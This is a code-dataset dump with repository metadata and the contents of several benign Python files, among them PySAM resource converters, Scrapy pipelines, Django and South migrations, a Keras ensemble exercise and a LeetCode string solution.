blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe85918273b3ffd9dc2339a9b0f97a381f0ab2db
|
22f80b809204010da7e8217374a2ca78a5613308
|
/files/ResourceTools.py
|
8f03f0628ceb8a13b409ba83e82ad66a8f46bbb8
|
[
"BSD-3-Clause"
] |
permissive
|
frohro/pysam
|
23421f506c25e3f2a57ef2533029e64dc856612d
|
cac4423410d948d886b3f19c83a73ac29ab618ae
|
refs/heads/master
| 2021-02-09T03:46:56.540560 | 2020-03-17T13:32:05 | 2020-03-17T13:32:05 | 244,236,139 | 0 | 0 |
BSD-3-Clause
| 2020-03-01T22:49:09 | 2020-03-01T22:49:08 | null |
UTF-8
|
Python
| false | false | 6,820 |
py
|
import csv
import os
from collections import defaultdict
def TMY_CSV_to_solar_data(filename):
    """
    Format a TMY csv file as 'solar_resource_data' dictionary for use in PySAM.

    :param: filename:
        any csv resource file formatted according to NSRDB
    :return: dictionary for PySAM.Pvwattsv7.Pvwattsv7.SolarResource, and other models
    """
    if not os.path.isfile(filename):
        raise FileNotFoundError(filename + " does not exist.")
    wfd = defaultdict(list)
    with open(filename) as file_in:
        # The first two lines are site metadata: a row of field names
        # followed by a row of their values.
        header_row = file_in.readline().split(",")
        value_row = file_in.readline().split(",")
        if "Time Zone" not in header_row:
            raise ValueError("`Time Zone` field not found in solar resource file.")
        tz = value_row[header_row.index("Time Zone")]
        elev = value_row[header_row.index("Elevation")]
        latitude = value_row[header_row.index("Latitude")]
        longitude = value_row[header_row.index("Longitude")]
        # The rest of the file is the hourly weather table; collect every
        # named column as a list of floats.
        for record in csv.DictReader(file_in):
            for column, cell in record.items():
                if len(column) > 0:
                    wfd[column].append(float(cell))

    # Translate NSRDB column names to the PySAM solar_resource_data keys.
    weather = {
        'tz': float(tz),
        'elev': float(elev),
        'lat': float(latitude),
        'lon': float(longitude),
        'year': wfd.pop('Year'),
        'month': wfd.pop('Month'),
        'day': wfd.pop('Day'),
        'hour': wfd.pop('Hour'),
        'minute': wfd.pop('Minute'),
        'dn': wfd.pop('DNI'),
        'df': wfd.pop('DHI'),
        'gh': wfd.pop('GHI'),
        'wspd': wfd.pop('Wind Speed'),
        'tdry': wfd.pop('Temperature'),
    }
    return weather
def SRW_to_wind_data(filename):
    """
    Format as 'wind_resource_data' dictionary for use in PySAM.

    :param: filename:
        srw wind resource file
    :return: dictionary for PySAM.Windpower.Windpower.Resource
    """
    if not os.path.isfile(filename):
        raise FileNotFoundError(filename + " does not exist.")
    data_dict = dict()
    # Accepted measurement names; a field's id is its 1-based position here.
    # (The original also defined an unused `fields_id` tuple — removed.)
    field_names = ('Temperature', 'Pressure', 'Speed', 'Direction')
    with open(filename) as file_in:
        # Skip the two site-description header lines.
        file_in.readline()
        file_in.readline()
        # Third line: the measurement name of each column.
        fields = str(file_in.readline().strip()).split(',')
        # Fourth line (units) is not used.
        file_in.readline()
        # Fifth line: the measurement height of each column, in meters.
        heights = str(file_in.readline().strip()).split(',')
        data_dict['heights'] = [float(i) for i in heights]
        data_dict['fields'] = []
        for field_name in fields:
            if field_name not in field_names:
                raise ValueError(field_name + " required for wind data")
            data_dict['fields'].append(field_names.index(field_name) + 1)
        # Remaining lines: one row of float measurements per timestep.
        data_dict['data'] = [[float(i) for i in row] for row in csv.reader(file_in)]
    return data_dict
def URDBv7_to_ElectricityRates(urdb_response):
    """
    Formats response from Utility Rate Database API version 7 for use in PySAM
        i.e.
            model = PySAM.UtilityRate5.new()
            rates = PySAM.ResourceTools.URDBv7_to_ElectricityRates(urdb_response)
            model.ElectricityRates.assign(rates)

    :param: urdb_response
        dictionary with response fields following https://openei.org/services/doc/rest/util_rates/?version=7
    :return: dictionary for PySAM.UtilityRate5.UtilityRate5.ElectricityRates
    """

    def try_get_schedule(urdb_name, data_name):
        # URDB schedules are 0-indexed period numbers; SAM expects 1-indexed.
        # Build a NEW nested list instead of incrementing in place: the
        # original mutated the caller's response dict, so converting the same
        # response twice shifted every period by 2.
        if urdb_name in urdb_response:
            data[data_name] = [[period + 1 for period in row]
                               for row in urdb_response[urdb_name]]

    def try_get_rate_structure(urdb_name, data_name):
        # Flatten a URDB period/tier structure into SAM's matrix rows:
        # (period, tier, tier max usage, usage units=0, buy rate, sell rate).
        mat = []
        if urdb_name in urdb_response:
            structure = urdb_response[urdb_name]
            for i, period in enumerate(structure):
                for j, entry in enumerate(period):
                    rate = entry['rate']
                    if 'adj' in entry:
                        rate += entry['adj']
                    tier_max = entry.get('max', 1e38)  # 1e38 = effectively unbounded
                    sell = entry.get('sell', 0)
                    if 'unit' in entry:
                        if entry['unit'].lower() not in ('kwh', 'kw'):
                            raise RuntimeError("UtilityRateDatabase error: unrecognized unit in rate structure")
                    mat.append((i + 1, j + 1, tier_max, 0.0, rate, sell))
            data[data_name] = mat

    data = dict()
    data['en_electricity_rates'] = 1

    # Map the URDB net-metering rule name onto SAM's metering option enum.
    # Use .get(): `dgrules` may be absent from a response, and the original
    # raised KeyError here while guarding every other optional field.
    rules = urdb_response.get('dgrules')
    if rules == "Net Metering":
        data['ur_metering_option'] = 0
    elif rules == "Net Billing Instantaneous":
        data['ur_metering_option'] = 2
    elif rules == "Net Billing Hourly":
        data['ur_metering_option'] = 3
    elif rules == "Buy All Sell All":
        data['ur_metering_option'] = 4

    if 'fixedchargefirstmeter' in urdb_response:
        fixed_charge = urdb_response['fixedchargefirstmeter']
        fixed_charge_units = urdb_response['fixedchargeunits']
        # Normalize the fixed charge to $/month.
        if fixed_charge_units == "$/day":
            fixed_charge *= 365 / 30
        elif fixed_charge_units == "$/year":
            fixed_charge /= 12
        data['ur_fixed_monthly_charge'] = fixed_charge

    if 'mincharge' in urdb_response:
        min_charge = urdb_response['mincharge']
        min_charge_units = urdb_response['minchargeunits']
        if min_charge_units == "$/year":
            data['ur_annual_min_charge'] = min_charge
        else:
            # Normalize daily minimums to $/month.
            if min_charge_units == "$/day":
                min_charge *= 365 / 30
            data['ur_monthly_min_charge'] = min_charge

    try_get_schedule('energyweekdayschedule', 'ur_ec_sched_weekday')
    try_get_schedule('energyweekendschedule', 'ur_ec_sched_weekend')

    if 'flatdemandmonths' in urdb_response:
        data['ur_dc_enable'] = 1
        flat_demand = urdb_response['flatdemandmonths']
        # ur_dc_flat_mat rows: (0-indexed month, tier 1, no tier cap, $/kW).
        data['ur_dc_flat_mat'] = [[month, 1, 1e38, flat_demand[month]]
                                  for month in range(12)]

    try_get_rate_structure('energyratestructure', 'ur_ec_tou_mat')
    # May overwrite the flatdemandmonths matrix above when both are present,
    # preserving the original precedence.
    try_get_rate_structure('flatdemandstructure', 'ur_dc_flat_mat')
    try_get_rate_structure('demandratestructure', 'ur_dc_tou_mat')

    try_get_schedule('demandweekdayschedule', 'ur_dc_sched_weekday')
    try_get_schedule('demandweekendschedule', 'ur_dc_sched_weekend')

    return data
|
[
"[email protected]"
] | |
11904ef28fb8158f2089b88efb705ee390701ba2
|
47008724082fd7fa39b87416bcd1d7633e9d8ef7
|
/04-使用Item封装数据/example/example/pipelines.py
|
65d9fcd59f07f0c6977eae5bb000f890f65df5e8
|
[
"Apache-2.0"
] |
permissive
|
gy0109/matser-scrapy-liushuo
|
1909d5902dcaf9a119a1cbf42dff9c9434fb58cc
|
99afa51aa30248282bf6d86f8a98a28b086f54ff
|
refs/heads/master
| 2020-05-16T09:25:13.429519 | 2019-04-25T12:34:30 | 2019-04-25T12:34:30 | 182,947,663 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 756 |
py
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class ExamplePipeline(object):
    """Default Scrapy pipeline: hands every item on unchanged."""

    def process_item(self, item, spider):
        # No transformation; returning the item keeps it flowing to any
        # later pipelines in ITEM_PIPELINES.
        return item
# pipeline不需要继承什么基类,只需要实现特定的方法 open_spider close_spider process_item
# process_item是必须要有的 用来处理spider怕取到的数据 item: 爬取到的一项数据 spider 爬取的spider对象
class BookPipeline(object):
    """Convert a scraped book price from GBP to CNY."""

    # GBP -> CNY exchange rate (汇率 in the original comment).
    exchange_rate = 8.5309

    def process_item(self, item, spider):
        """Strip the currency symbol, convert to CNY, and reformat the price.

        Bug fix: the original parsed the GBP amount but never multiplied by
        `exchange_rate`, so the ¥ price shown was still the £ number.
        """
        # item['price'] looks like '£51.77'; drop the leading symbol.
        price = float(item['price'][1:]) * self.exchange_rate
        item['price'] = '¥%.2f' % price
        return item
|
[
"[email protected]"
] | |
c303cf21bf6d1ff3eeb3773c71c758ca5533d3e5
|
b4c93bad8ccc9007a7d3e7e1d1d4eb8388f6e988
|
/ph_locations/migrations/0002_auto_20210319_1358.py
|
6de5bb1e1c5891f630460b5a245aa21ef859f2f2
|
[] |
no_license
|
flashdreiv/fis
|
39b60c010d0d989a34c01b39ea88f7fc3be0a87d
|
b93277785d6ad113a90a011f7c43b1e3e9209ec5
|
refs/heads/main
| 2023-04-02T12:46:32.249800 | 2021-03-31T00:27:29 | 2021-03-31T00:27:29 | 343,431,800 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 802 |
py
|
# Generated by Django 3.1.7 on 2021-03-19 05:58
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add nullable `name` fields to City and Province, and link each City to
    its Province. (Auto-generated by Django; do not hand-edit field order.)"""

    dependencies = [
        ('ph_locations', '0001_initial'),
    ]

    operations = [
        # Nullable so existing City rows migrate without needing a default.
        migrations.AddField(
            model_name='city',
            name='name',
            field=models.CharField(max_length=80, null=True),
        ),
        # SET_NULL keeps City rows alive when their Province is deleted.
        migrations.AddField(
            model_name='city',
            name='province',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='ph_locations.province'),
        ),
        migrations.AddField(
            model_name='province',
            name='name',
            field=models.CharField(max_length=80, null=True),
        ),
    ]
|
[
"[email protected]"
] | |
6b172bfdaa735bf76829cc5489e174778ff42719
|
0910e259a9bd252300f19b2ff22049d640f19b1a
|
/keras1/keras29_LSTM_ensemble2_differ.py
|
d841844016d8c7af269a3cb1dde3aa105b767905
|
[] |
no_license
|
kimtaeuk-AI/Study
|
c7259a0ed1770f249b78f096ad853be7424a1c8e
|
bad5a0ea72a0117035b5e45652819a3f7206c66f
|
refs/heads/master
| 2023-05-05T12:34:52.471831 | 2021-05-22T16:16:12 | 2021-05-22T16:16:12 | 368,745,041 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,932 |
py
|
# Two-input ensemble: one branch is an LSTM model, the other a Dense model.
# Compare performance against script 29_1.
import numpy as np
import tensorflow as tf

# Toy data: 13 samples x 3 timesteps. The last three rows of x1/x2 break the
# step-by-one pattern of the earlier rows, as do the last three targets in y.
x1 = np.array([[1,2,3], [2,3,4], [3,4,5], [4,5,6], [5,6,7], [6,7,8], [7,8,9], [8,9,10], [9,10,11], [10,11,12], [20,30,40], [30,40,50], [40,50,60]])
x2 = np.array([[10,20,30],[20,30,40],[30,40,50],[40,50,60],[50,60,70],[60,70,80],[70,80,90],[80,90,100],[90,100,110],[100,110,120],[2,3,4],[3,4,5],[4,5,6]])
y = np.array([4,5,6,7,8,9,10,11,12,13,50,60,70])
x1_predict = np.array([55,65,75])
x2_predict = np.array([65,75,85])
print(x1.shape) #(13,3)
print(x2.shape) #(13,3)
print(y.shape) #(13,)
print(x1_predict.shape) #(3,)
print(x2_predict.shape) #(3,)

# NOTE(review): these 3-D reshapes are computed but never used below — the
# fit/evaluate calls feed the 2-D splits of x1/x2 directly. Confirm whether
# the LSTM branch was meant to receive x1_LSTM-style input instead.
x1_LSTM=x1.reshape(x1.shape[0],x1.shape[1],1)
x2_LSTM=x2.reshape(x2.shape[0],x1.shape[1],1)
# x1_predict = x1_predict.reshape(1, 3,1)

from sklearn.model_selection import train_test_split
# Identical random_state keeps the x1 and x2 row splits aligned with y.
x1_train, x1_test, y_train, y_test = train_test_split(x1, y, train_size=0.8, shuffle=True, random_state=66)
x2_train, x2_test, y_train, y_test = train_test_split(x2, y, train_size=0.8, shuffle=True, random_state=66)

# (disabled) MinMax scaling experiment:
# from sklearn.preprocessing import MinMaxScaler
# scaler = MinMaxScaler()
# scaler.fit(x1_train)
# # scaler.fit(x2_train)
# # scaler.fit(x1_test)
# # scaler.fit(x2_test)
# x1_train = scaler.transform(x1_train)
# x1_train = scaler.transform(x1_train)
# x1_test = scaler.transform(x1_test)
# x2_test = scaler.transform(x2_test)
# from tensorflow.keras.callbacks import EarlyStopping
# early_stopping = EarlyStopping(monitor='loss',patience=20, mode='min')

from tensorflow.keras.models import Sequential, Model
from tensorflow.keras.layers import Dense, Input, concatenate, LSTM

# Branch 1: LSTM over (timesteps=3, features=1).
input1 = Input(shape=(3,1))
dense1 = LSTM(10, activation='relu')(input1)
dense1 = Dense(10)(dense1)

# Branch 2: plain Dense over the 3 raw values.
input2 = Input(shape=(3))
dense2 = Dense(10, activation='relu')(input2)
dense2 = Dense(10)(dense2)

# Merge the branches and regress a single value.
merge1 = concatenate([dense1, dense2])
# middle1 = Dense(10, activation='relu')(merge1)
# middle1 = Dense(10)(middle1)  # extra middle layers not needed
output1 = Dense(10)(merge1)
output1 = Dense(30)(output1)
output1 = Dense(1)(output1)
# output2 = Dense(10)(middle1)
# output2 = Dense(1)(output2)
model = Model(inputs=[input1, input2], outputs=output1)

model.compile(loss = 'mse', optimizer='adam', metrics='mae')
model.fit([x1_train,x2_train], y_train, epochs=500, validation_split=0.2, batch_size=1)
loss = model.evaluate([x1_test,x2_test], y_test)

x1_pred= x1_predict.reshape(1,3,1) # (3,) -> (1, 3)(dense) ->(1, 3, 1)(LSTM)
x2_pred= x2_predict.reshape(1, 3, 1) # (3,) -> (1, 3)(dense) ->(1, 3, 1)(LSTM)
# NOTE(review): x2 feeds the Dense branch declared with Input(shape=(3));
# reshaping x2_pred to (1, 3, 1) looks inconsistent with that — confirm.
y1_predict = model.predict([x1_pred,x2_pred])
print('loss = ', loss)
print('result : ', y1_predict)

# Recorded runs:
# loss = [5.709522724151611, 1.6373800039291382]  - left run is LSTM-only; the right-hand setup is better
# result : [[94.837204]]
# loss = [2.0639169216156006, 1.1473256349563599]
# result : [[78.38083]] - train_test_split
|
[
"[email protected]"
] | |
19c5bac30dc1812153c6ada47917d8a1ad43f1cf
|
a4cfe8b47d3da97d335b210994fe03f8aa5b2f77
|
/vint/linting/config/config_project_source.py
|
0869f9ee8a02f71819a20b3062f265425bec19e2
|
[
"MIT"
] |
permissive
|
blueyed/vint
|
e6e7bbbf43a7b337f60d05d768d424fe400d40d8
|
9ae019d6e7863a4c9634faa39b9b75111dd2ad36
|
refs/heads/master
| 2021-01-13T16:40:04.962921 | 2016-12-22T12:00:45 | 2016-12-22T12:00:45 | 78,246,540 | 0 | 0 | null | 2017-01-06T23:28:35 | 2017-01-06T23:28:35 | null |
UTF-8
|
Python
| false | false | 805 |
py
|
from pathlib import Path
from vint.asset import get_asset_path
from vint.linting.config.config_file_source import ConfigFileSource
PROJECT_CONFIG_FILENAMES = [
'.vintrc.yaml',
'.vintrc.yml',
'.vintrc',
]
VOID_CONFIG_PATH = get_asset_path('void_config.yaml')
class ConfigProjectSource(ConfigFileSource):
    """Config source that looks for a project-level vintrc file."""

    def get_file_path(self, env):
        """Return the project config file nearest to env['cwd'], searching
        upward through parent directories; fall back to the void config.

        Bug fix: the original `break` only exited the inner basename loop, so
        the outer loop kept walking toward the filesystem root and a config in
        a distant ancestor directory silently overwrote the one found closest
        to cwd. Returning on the first hit makes the nearest config win.
        """
        # Search order: cwd first, then each parent up to the root.
        path_list_to_search = [Path(env['cwd'])] + list(Path(env['cwd']).parents)

        for project_path in path_list_to_search:
            # Within a directory, earlier basenames take precedence.
            for basename in PROJECT_CONFIG_FILENAMES:
                proj_conf_path = project_path / basename
                if proj_conf_path.is_file():
                    return proj_conf_path

        return VOID_CONFIG_PATH
|
[
"[email protected]"
] | |
0eea1f221c0a6316a2eed2457dffd111f15c8a0b
|
16e69196886254bc0fe9d8dc919ebcfa844f326a
|
/edc/core/bhp_content_type_map/migrations/0005_update_module_name.py
|
67a886c53b822966a1fc216991741f16ccb05bd3
|
[] |
no_license
|
botswana-harvard/edc
|
b54edc305e7f4f6b193b4498c59080a902a6aeee
|
4f75336ff572babd39d431185677a65bece9e524
|
refs/heads/master
| 2021-01-23T19:15:08.070350 | 2015-12-07T09:36:41 | 2015-12-07T09:36:41 | 35,820,838 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,009 |
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
    """South data migration: copy each ContentTypeMap row's `model` value into
    its `module_name` field. Schema is unchanged; only row data is updated."""

    def forwards(self, orm):
        "Populate module_name from model for every ContentTypeMap row."
        # Note: Remember to use orm['appname.ModelName'] rather than "from appname.models..."
        ContentTypeMap = orm['bhp_content_type_map.ContentTypeMap']
        for obj in ContentTypeMap.objects.all():
            obj.module_name = obj.model
            obj.save()
            # Progress output per updated row (Python 2 style print).
            print (obj.app_label, obj.module_name)

    def backwards(self, orm):
        "No-op: previous module_name values are not recorded, so this data migration cannot be reversed."
        pass

    # Frozen ORM snapshot used by South to build the `orm` object above.
    # Auto-generated; do not hand-edit field definitions.
    models = {
        'bhp_content_type_map.contenttypemap': {
            'Meta': {'ordering': "['name']", 'unique_together': "(['app_label', 'model'],)", 'object_name': 'ContentTypeMap'},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
            'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'hostname_created': ('django.db.models.fields.CharField', [], {'default': "'mac.local'", 'max_length': '50', 'db_index': 'True', 'blank': 'True'}),
            'hostname_modified': ('django.db.models.fields.CharField', [], {'default': "'mac.local'", 'max_length': '50', 'db_index': 'True', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}),
            'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
            'module_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
            'user_created': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'db_index': 'True'}),
            'user_modified': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '250', 'db_index': 'True'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }

    complete_apps = ['bhp_content_type_map']
    symmetrical = True
|
[
"[email protected]"
] | |
4404bba47db646d9416036a3aa8e535334e7902f
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4060/codes/1684_1100.py
|
47661cdbda903bedb36e8d7ab2f89e70b5985e55
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 541 |
py
|
# Read a Brazilian banknote value and print the animal pictured on it.
# Unrecognized values report an invalid animal.

# Each valid note value mapped to its full output line.
animal_por_nota = {
    2: "Animal: Tartarura",
    5: "Animal: Garca",
    10: "Animal: Arara",
    20: "Animal: Mico-leao-dourado",
    50: "Animal: Onca-pintada",
    100: "Animal: Garoupa",
}

valor = int(input("Entrada: "))
print("Entrada:", valor)
print(animal_por_nota.get(valor, "Animal: Invalido"))
|
[
"[email protected]"
] | |
fc1fa4990f3eb7c426991f2e920afe5ac67e8b2a
|
150d9e4cee92be00251625b7f9ff231cc8306e9f
|
/ReverseWordsIII.py
|
35bceae2ed4be0c631984cf4c703decb182946b7
|
[] |
no_license
|
JerinPaulS/Python-Programs
|
0d3724ce277794be597104d9e8f8becb67282cb0
|
d0778178d89d39a93ddb9b95ca18706554eb7655
|
refs/heads/master
| 2022-05-12T02:18:12.599648 | 2022-04-20T18:02:15 | 2022-04-20T18:02:15 | 216,547,245 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,277 |
py
|
'''
557. Reverse Words in a String III
Given a string s, reverse the order of characters in each word within a sentence while still preserving whitespace and initial word order.
Example 1:
Input: s = "Let's take LeetCode contest"
Output: "s'teL ekat edoCteeL tsetnoc"
Example 2:
Input: s = "God Ding"
Output: "doG gniD"
Constraints:
1 <= s.length <= 5 * 104
s contains printable ASCII characters.
s does not contain any leading or trailing spaces.
There is at least one word in s.
All the words in s are separated by a single space.
'''
class Solution(object):
    def reverseWords(self, s):
        """
        Reverse the characters of each word while keeping word order.

        :type s: str
        :rtype: str
        """
        # Idiomatic rewrite of the original manual two-pointer swap over
        # per-word character lists: slice-reverse each word and rejoin.
        # split()/join reproduces the original's output exactly (it also
        # built words from split() and trimmed one trailing space).
        return ' '.join(word[::-1] for word in s.split())
# Ad-hoc smoke test using the problem's first example; expected output:
# "s'teL ekat edoCteeL tsetnoc"
obj = Solution()
print(obj.reverseWords("Let's take LeetCode contest"))
|
[
"[email protected]"
] | |
5972e9b3b763273f9a652d66f3d080b66c693961
|
6dedbcff0af848aa979574426ad9fa3936be5c4a
|
/cengal/parallel_execution/coroutines/coro_standard_services/remote_nodes/versions/v_0/request_class_info.py
|
fb2ff414d2289c06f43f46ac97d35a61e59d0cfe
|
[
"Apache-2.0"
] |
permissive
|
FI-Mihej/Cengal
|
558d13541865e22006431bd1a1410ad57261484a
|
d36c05f4c90dfdac7296e87cf682df2f4d367e4b
|
refs/heads/master
| 2023-06-08T00:39:39.414352 | 2023-06-05T21:35:50 | 2023-06-05T21:35:50 | 68,829,562 | 10 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,043 |
py
|
#!/usr/bin/env python
# coding=utf-8
# Copyright © 2012-2023 ButenkoMS. All rights reserved. Contacts: <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module Docstring
Docstrings: http://www.python.org/dev/peps/pep-0257/
"""
__author__ = "ButenkoMS <[email protected]>"
__copyright__ = "Copyright © 2012-2023 ButenkoMS. All rights reserved. Contacts: <[email protected]>"
__credits__ = ["ButenkoMS <[email protected]>", ]
__license__ = "Apache License, Version 2.0"
__version__ = "3.2.6"
__maintainer__ = "ButenkoMS <[email protected]>"
__email__ = "[email protected]"
# __status__ = "Prototype"
__status__ = "Development"
# __status__ = "Production"
from enum import Enum
from cengal.parallel_execution.coroutines.coro_scheduler import *
from cengal.parallel_execution.coroutines.coro_tools.await_coro import *
from cengal.parallel_execution.coroutines.coro_standard_services.asyncio_loop import *
from cengal.parallel_execution.coroutines.coro_standard_services.loop_yield import CoroPriority
from cengal.parallel_execution.coroutines.coro_standard_services.put_coro import *
from cengal.parallel_execution.coroutines.coro_standard_services.timer_func_runner import *
from cengal.file_system.file_manager import path_relative_to_current_dir
from cengal.time_management.load_best_timer import perf_counter
from cengal.data_manipulation.serialization import *
from typing import Hashable, Tuple, List, Any, Dict, Callable, Type
from cengal.introspection.inspect import get_exception, entity_owning_module_importable_str, entity_owning_module_info_and_owning_path, entity_properties
from cengal.io.core.memory_management import IOCoreMemoryManagement
from cengal.parallel_execution.asyncio.efficient_streams import StreamManagerIOCoreMemoryManagement, TcpStreamManager, UdpStreamManager, StreamManagerAbstract
from cengal.code_flow_control.smart_values import ValueExistence
from cengal.io.named_connections.named_connections_manager import NamedConnectionsManager
from cengal.code_flow_control.args_manager import number_of_provided_args
from cengal.data_manipulation.serialization import Serializer, Serializers, best_serializer
from cengal.code_flow_control.args_manager import find_arg_position_and_value, UnknownArgumentError
from cengal.data_generation.id_generator import IDGenerator, GeneratorType
from cengal.system import PLATFORM_NAME, PYTHON_VERSION
from importlib import import_module
import sys
import os
import asyncio
import lmdb
from .exceptions import *
from .commands import *
from .class_info import *
class LocalRequestClassInfo(LocalClassInfo):
    """Describes a locally known Request class for declaration to a remote node.

    Enumerates the request's properties once, assigning each a small integer
    id, so that subsequent requests can be serialized compactly as
    (property id, value) pairs instead of repeating property names.
    """

    def __init__(self, local_id: Hashable, request: Request) -> None:
        # Register the request's concrete type under `local_id` with the base class.
        super().__init__(local_id, type(request))
        self._properties: Dict[str, Hashable] = {property_name: index for index, property_name in enumerate(entity_properties(request))} # key: property name; value: property id
        # Frozen (name, id) pairs in enumeration order, reused for every serialization.
        self._properties_tuple: Tuple[Tuple[str, Hashable]] = tuple(self._properties.items())

    def __call__(self) -> Type:
        """Build the class-declaration payload sent to the remote node."""
        return {
            CommandDataFieldsDeclareServiceRequestClass.local_id.value: self._local_id,
            CommandDataFieldsDeclareServiceRequestClass.class_name.value: self._class_name,
            CommandDataFieldsDeclareServiceRequestClass.module_importable_str.value: self._module_importable_str,
            CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value: self._properties_tuple,
        }

    @property
    def properties(self):
        # Mapping of property name -> property id.
        return self._properties

    @property
    def properties_tuple(self):
        # Tuple of (property name, property id) pairs.
        return self._properties_tuple

    def request_to_data(self, request: Request) -> Dict:
        """Serialize a request instance as (property id, value) pairs plus this class's id."""
        return {
            CommandDataFieldsServiceRequestWithRequestClass.request_class_id.value: self._local_id,
            CommandDataFieldsServiceRequestWithRequestClass.properties_tuple.value: tuple(((property_id, getattr(request, property_name)) for property_name, property_id in self._properties_tuple)),
        }
class RemoteRequestClassInfo(RemoteClassInfo):
    """Counterpart of LocalRequestClassInfo on the receiving node: rebuilds
    Request instances from (property id, value) pairs using the declared
    property-id mapping."""

    def __init__(self, local_id: Hashable, class_name: str, module_importable_str: str, properties_tuple: Tuple[Tuple[str, Hashable]]) -> None:
        super().__init__(local_id, class_name, module_importable_str)
        self._properties_tuple: Tuple[Tuple[str, Hashable]] = properties_tuple
        # Inverted mapping for decoding incoming data.
        self._properties: Dict[Hashable, str] = {index: property_name for property_name, index in properties_tuple} # key: property id; value: property name

    @classmethod
    def from_data(cls, data: Dict[Hashable, Any]) -> 'RemoteRequestClassInfo':
        """Construct from a class-declaration payload produced by LocalRequestClassInfo.__call__."""
        local_id: Hashable = data[CommandDataFieldsDeclareServiceRequestClass.local_id.value]
        class_name: str = data[CommandDataFieldsDeclareServiceRequestClass.class_name.value]
        module_importable_str: str = data[CommandDataFieldsDeclareServiceRequestClass.module_importable_str.value]
        properties_tuple: Tuple[Tuple[str, Hashable]] = data[CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value]
        return cls(local_id, class_name, module_importable_str, properties_tuple)

    def __call__(self, data: Dict) -> Request:
        """Instantiate the request class and populate it from serialized (id, value) pairs.

        NOTE(review): this reads the properties_tuple field via the
        *Declare* enum, while LocalRequestClassInfo.request_to_data writes it
        via CommandDataFieldsServiceRequestWithRequestClass — confirm the two
        enums assign the same wire value to that field.
        """
        request: Request = self.class_type()
        properties_tuple: Tuple[Tuple[Hashable, Any]] = data[CommandDataFieldsDeclareServiceRequestClass.properties_tuple.value]
        for index, value in properties_tuple:
            name: str = self._properties[index]
            setattr(request, name, value)
        return request
|
[
"[email protected]"
] | |
c7be3da8472cb8def0f76e0cac71b79a7063ba14
|
c829275111b9025dcccc9ac1b92d8dc51adbb71d
|
/photo/urls.py
|
